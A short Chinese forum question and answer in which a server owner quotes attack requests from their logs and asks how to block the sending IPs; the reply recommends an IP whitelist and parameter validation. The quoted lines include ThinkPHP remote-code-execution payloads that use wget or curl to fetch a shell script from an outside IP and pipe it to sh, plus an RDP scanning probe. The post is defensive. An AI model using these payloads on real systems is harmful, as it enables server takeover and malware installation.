1、请求1:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh
2、请求2:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2082.146.58.234/p2.sh|sh
3、请求3:
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
有几个不同的ip发送上面的这些代码 让人很烦 有什么思路 禁止这些ip访问我的端口吗
如果你的接口是少数人使用,或者你只想让指定的ip(授权过的ip)访问你的接口,就可以设置ip白名单。
其实思路很简单,你可以设置一个ip表,允许访问的ip放到表里面。接口入口处做ip校验(表中不存在则返回失败,无权限)。或者使用配置文件等等。
建议:接口请求参数做校验,转义。